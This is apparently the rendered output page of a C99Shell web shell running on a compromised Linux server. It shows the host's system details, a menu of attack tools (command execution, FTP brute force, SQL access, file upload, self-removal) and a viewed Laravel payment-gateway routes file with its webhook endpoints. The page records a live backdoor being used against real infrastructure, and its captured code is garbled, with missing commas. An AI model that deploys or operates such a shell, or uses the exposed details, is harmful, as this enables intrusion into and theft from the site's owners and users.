!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.gateway.picotech.app/public_html/Modules/PaymentGateway/Routes/   drwxr-xr-x
Free 28.36 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     web.php (2.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::name('paymentgateway::')->prefix('payment')->group(function() {
    
Route::get('/''PaymentGatewayController@index');
    
Route::post('/process''PaymentGatewayController@process')->name('process');
    
Route::get('/email/payment/process''PaymentGatewayController@email_payment_process')->name('email.payment.process');
    
Route::post('/process/paynow''PaymentGatewayController@payNow')->name('process.paynow');
    
Route::post('/setting/gateway/store''SettingController@store')->name('payment.settings.store');
//    Coin Payment
    
Route::post('/process/coin/payment''PaymentGatewayController@coinPayment')->name('process.coin.payment');
//    Check payment validity
    
Route::get('/check-payment/validity''PaymentGatewayController@checkValidPayment')->name('check.payment.validity');

    
Route::post('/payment/paytm/success','PaymentGatewayController@processPaytmRedirect')->name('payment.paytm.redirect');
//Mollie
    
Route::get('/payment/process/mollie','PaymentGatewayController@processMollieSuccess')->name('payment.mollie.success');
    
Route::post('/payment/plan-change/mollie/{id}','PaymentGatewayController@processMollieWebhook')->name('payment.changeplan.mollie.webhook');
//    Paystack
    
Route::get('/payment/paystack/process','PaymentGatewayController@processPaystackPayment')->name('payment.paystack.process');

    
Route::get('/process/success''PaymentGatewayController@paymentSuccess')->name('payment.process.success');
    
Route::get('/process/cancel''PaymentGatewayController@paymentCancel')->name('payment.process.cancel');
    
Route::get('/coinbase/charge/canceled''PaymentGatewayController@coinbaseCanceled')->name('payment.coinbase.canceled');
    
Route::get('/coinbase/charge/completed''PaymentGatewayController@coinbaseCompleted')->name('payment.coinbase.completed');
});
Route::post('/coin/payment/webhook', ['uses' => 'PaymentGatewayController@webhook''as' => 'coin.payment']);


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--